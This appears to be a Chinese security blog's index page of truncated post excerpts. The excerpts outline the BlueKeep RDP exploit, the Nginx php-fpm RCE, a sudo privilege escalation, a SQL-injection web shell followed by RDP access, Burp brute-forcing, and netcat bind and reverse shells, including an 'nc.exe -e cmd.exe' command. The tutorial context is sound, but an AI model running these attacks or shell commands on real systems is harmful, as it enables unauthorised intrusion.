2019年10月24日
摘要:
影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7环境:攻击机:kali ip:192.168.40.128靶机:windows sever2008 ip:192.168.40.131工具:360_RDP漏扫工具或者MSF框架PO
阅读全文
posted @ 2019-10-24 16:50
Lmos
阅读(846)
推荐(0)
摘要:
漏洞详情: Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。 影响范围: Nginx+php-fpm的服务器,在使用如下配
阅读全文
posted @ 2019-10-24 11:18
Lmos
阅读(2198)
推荐(0)
2019年10月15日
摘要:
漏洞详情 sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。 系统平台 kali-Linux 软件版本 1.8.27 sudo作用 非root用户不需要知道root密码,就可以执行root才能执行的命令。 首先新建test用户 使用visudo命令添加规则,使得test用户可以执
阅读全文
posted @ 2019-10-15 23:11
Lmos
阅读(506)
推荐(0)
2019年8月26日
摘要:
首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php 用蚁剑连接打开连接的终端 先看用户的权限 创建一个用户将它放入队列中 查看3389端口是否开启 0xd3d 16进制解码为3389 打开远程桌面连接输入新建的用户和密码 成功远程桌面连接
阅读全文
posted @ 2019-08-26 20:42
Lmos
阅读(652)
推荐(0)
2019年8月20日
摘要:
首先burp抓包,将抓到的包放到intruder中 通过burp中自带的解码得知账号密码中有个“:“号 所以我们选择的数据类型为Custom iterator 第二条输入”:“ 将字典编码了对应爆破 因为爆破的时候会将字符URL编码了,所以需要将那个选项去掉 完成 爆破 这里调整可爆破MD5加密的。
阅读全文
posted @ 2019-08-20 11:55
Lmos
阅读(2389)
推荐(0)
2019年8月17日
摘要:
正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击
阅读全文
posted @ 2019-08-17 13:08
Lmos
阅读(489)
推荐(0)
2019年8月14日
摘要:
<?php header('content-type:text/html; charset=utf-8'); $host = '58.com'; $hosts = gethostbyname('fuckfuck.'.$host) if ($hosts != 'fuckfuck.'.$host){ f
阅读全文
posted @ 2019-08-14 20:24
Lmos
阅读(343)
推荐(0)
2019年8月13日
posted @ 2019-08-13 18:06
Lmos
阅读(1032)
推荐(0)
2019年8月12日
摘要:
通过钟馗之眼搜索目标网站的证书使用者找到信息泄露的网站, 点击上图中的edit会跳转 手工注入sql发现有效 that's all
阅读全文
posted @ 2019-08-12 17:59
Lmos
阅读(171)
推荐(0)
2019年7月29日
摘要:
100 Continue 这个临时响应表明,迄今为止的所有内容都是可行的,客户端应该继续请求,如果已经完成,则忽略它。 101 Switching Protocol 该代码是响应客户端的 Upgrade 标头发送的,并且指示服务器也正在切换的协议。 102 Processing (WebDAV) 此
阅读全文
posted @ 2019-07-29 20:21
Lmos
阅读(361)
推荐(0)